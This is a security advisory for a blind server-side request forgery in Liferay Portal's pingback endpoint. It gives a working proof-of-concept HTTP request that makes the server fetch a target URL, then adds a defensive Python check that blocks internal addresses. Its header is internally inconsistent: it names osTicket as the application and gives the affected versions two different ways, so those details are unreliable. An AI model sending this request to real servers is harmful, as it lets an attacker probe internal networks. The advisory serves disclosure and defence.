1. ADVISORY INFORMATION
========================================
Title: Liferay Portal < 7.0.4 Blind Server-Side Request Forgery
Application: osTicket
Remotely Exploitable: Yes
Authentication Required: NO
Versions Affected: <= 7.0.4
Technology: Java
Vendor URL: liferay.com
Date of found: 04 December 2017
Disclosure: 25 June 2018
Author: Mehmet Ince

2. CREDIT
========================================
This vulnerability was identified during a penetration test by Mehmet INCE from PRODAFT / INVICTUS

3. Technical Details & POC
========================================
POST /xmlrpc/pingback HTTP/1.1
Host: mehmetince.dev:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 361

<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
  <methodName>pingback.ping</methodName>
  <params>
    <param>
      <value>http://TARGET/</value>
    </param>
    <param>
      <value>http://mehmetince.dev:8080/web/guest/home/-/blogs/30686</value>
    </param>
  </params>
</methodCall>
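
A defensive check for the request above, added here as an example (not code from the advisory or from Liferay): before a pingback handler fetches the first parameter, it refuses sources that are not http(s) or that resolve to loopback, private or link-local addresses. The function names, the resolver hook and the placeholder host names are assumptions.

```python
import ipaddress
import socket
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# Constructed sample body in the shape of the advisory's request; host names are placeholders.
SAMPLE = ("<methodCall><methodName>pingback.ping</methodName><params>"
          "<param><value>http://intranet.example/</value></param>"
          "<param><value>http://blog.example/web/guest/home/-/blogs/1</value></param>"
          "</params></methodCall>")


def pingback_source(body):
    """Return the first param (source URI) of a pingback.ping call, or None.

    Accepts both <value>text</value> and <value><string>text</string></value>.
    """
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return None
    if root.tag != "methodCall" or (root.findtext("methodName") or "").strip() != "pingback.ping":
        return None
    text = root.findtext("params/param/value/string") or root.findtext("params/param/value")
    return (text or "").strip() or None


def resolve(host):
    """Default resolver: every address the name maps to (raises OSError on failure)."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def check_pingback(body, resolver=resolve):
    """Return (allowed, reason); refuse sources that are not public http(s) hosts."""
    source = pingback_source(body)
    if source is None:
        return False, "not a well-formed pingback.ping call"
    try:
        parts = urlsplit(source)
        if parts.scheme not in ("http", "https") or not parts.hostname:
            return False, "source is not an http(s) URL"
        addrs = resolver(parts.hostname)
        internal = sorted(a for a in addrs if not ipaddress.ip_address(a).is_global)
    except (OSError, ValueError):
        return False, "source URL is malformed or does not resolve"
    if internal:
        return False, "source resolves to non-public address " + internal[0]
    return True, "ok"


if __name__ == "__main__":
    print(check_pingback(SAMPLE, lambda host: {"10.0.0.5"}))  # constructed resolver, runs offline
```

The fetch that follows has to connect to the address that was checked and apply the same check to every redirect, otherwise a second DNS lookup or a redirect can point it back at an internal host.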